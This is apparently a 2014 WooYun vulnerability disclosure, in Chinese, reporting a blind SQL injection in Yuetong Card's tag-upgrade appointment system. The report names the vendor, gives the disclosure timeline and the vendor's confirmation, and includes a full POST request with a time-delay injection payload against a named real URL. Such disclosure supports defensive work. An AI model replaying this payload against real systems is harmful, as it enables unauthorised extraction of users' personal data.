漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-058742
漏洞标题:粤通卡某预约系统SQL注入
相关厂商:粤通卡
漏洞作者: Netf
提交时间:2014-05-04 17:00
修复时间:2014-06-18 17:00
公开时间:2014-06-18 17:00
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:8
漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-05-04: 细节已通知厂商并且等待厂商处理中
2014-05-04: 厂商已经确认,细节仅向厂商公开
2014-05-14: 细节向核心白帽子及相关领域专家公开
2014-05-24: 细节向普通白帽子公开
2014-06-03: 细节向实习白帽子公开
2014-06-18: 细节向公众公开
简要描述:
粤通卡某预约系统存SQL注入漏洞,可爆用户信息。
详细说明:
粤通卡专用电子标签升级预约系统:http://website.96533.com/default.asp,存在SQL盲注漏洞,可爆预约用户信息,包括车牌等,以及主站库:
http://website.96533.com:80/Zhyy_S1.aspx (POST)
hf_color=uyV7w61v'; waitfor delay '0:0:0' -- &ImageButton1.x=-432&ImageButton1.y=-560&ScriptManager1=UpdatePanel1|ImageButton1&txt_license=e&txt_license_confir=e&txt_tel=e&txt_tel_confir=e&__ASYNCPOST=true&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWDQLX%2BtC5AQLu8Ov2BQKvk6sxAr/Hy7kCAsPzg/oPAon1%2B5gOArb6/8MIAsvFq6QCApbl4NsKAqW8o%2BECAtLCmdMIAtLC1eQCAq/jpfwEAZK0r0i12iWxpMiRROZAcWNDNX4%3D&__VIEWSTATE=/wEPDwUKMTY4NjU1OTE3MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgcFB2liX2JsdWUFCWliX3llbGxvdwUIaWJfYmxhY2sFCGliX3doaWxlBQVpYl9idwUMSW1hZ2VCdXR0b24xBQxJbWFnZUJ1dHRvbjJ%2BgVlyFzZKTKSzvOJGI4aN%2BmxWqA%3D%3D
漏洞证明:
修复方案:
建议在上线前对系统进行安全测试。
版权声明:转载请注明来源 Netf@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:7
确认时间:2014-05-04 18:04
厂商回复:
非常感谢您的报告。
报告中的问题已确认并复现,典型的SQL注射漏洞,能被进一步利用,危害性大.
影响的数据:高
攻击成本:低
造成影响:中
综合评级为:中,rank:7
正在联系相关网站管理单位处置。
最新状态:
暂无